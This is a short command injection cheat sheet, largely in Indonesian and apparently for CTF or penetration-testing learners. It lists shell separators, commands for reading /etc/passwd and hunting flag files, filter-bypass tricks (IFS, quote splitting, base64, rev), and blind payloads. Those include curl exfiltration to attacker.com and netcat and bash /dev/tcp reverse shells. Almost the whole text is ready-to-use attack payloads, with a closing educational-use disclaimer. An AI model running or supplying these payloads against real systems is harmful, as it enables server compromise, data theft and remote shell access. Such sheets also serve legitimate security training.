Command Injection

Command Separators

Digunakan untuk menyambungkan perintah kita dengan perintah asli server.

Separator	Description	Example
`;`	Command chaining (Linux/Windows)	`ping 127.0.0.1 ; whoami`
`&`	Run in background (Linux/Windows)	`ping 127.0.0.1 & whoami`
`&&`	Run only if first succeeds (AND)	`ping 127.0.0.1 && whoami`
`	`	Pipe output to next command
`		`
`$`	Command substitution	`echo $(whoami)`
`	Command substitution (backticks)	echo `whoami`
`\n` (0x0a)	Newline character	`%0a whoami`

Purpose	Command
Check user	`whoami`, `id`
List files	`ls -la`
Read file	`cat /etc/passwd`, `head /etc/passwd`
Network Info	`ifconfig`, `ip a`, `netstat -an`
System Info	`uname -a`, `ps -ef`
Find flags	`find / -name "flag.txt"`, `grep -r "flag" /var/www`

Jika spasi diblokir, gunakan karakter lain sebagai pemisah.

Technique	Example
Input Redirection	`cat</etc/passwd`
IFS Variable (Internal Field Separator)	`cat${IFS}/etc/passwd`
Brace Expansion	`{cat,/etc/passwd}`
Tab Character	`%09`

Jika kata kunci seperti “cat” atau “flag” diblokir.

Technique	Example	Explanation
Concatenation	`a=c;b=at;$a$b /etc/passwd`	Gabung variabel
Single Quotes	`c'a't /etc/passwd`	Shell mengabaikan quote kosong
Double Quotes	`c"a"t /etc/passwd`	Shell mengabaikan quote kosong
Backslash	`c\at /etc/passwd`	Escape character
Wildcard	`/bin/c?? /etc/passwd`	Mencocokkan “cat”
Base64	`echo “Y2F0IC9ldGMvcGFzc3dk”	base64 -d
Rev	`echo “dwssap/cte/ tac”	rev

Jika tidak ada output yang muncul (silent), gunakan time-based atau out-of-band (OOB).

Type	Payload
Time Based	`ping -c 5 127.0.0.1` (Tunggu 5 detik)
Time Based (Sleep)	`sleep 5`
Data Exfiltration (OOB)	`curl http://attacker.com/$(whoami)`
Netcat Reverse Shell	`nc -e /bin/sh attacker.com 4444`
Bash Reverse Shell	`bash -i >& /dev/tcp/attacker.com/4444 0>&1`

⚠️ Educational Purpose Only. Use these payloads only on systems you own or have explicit permission to test.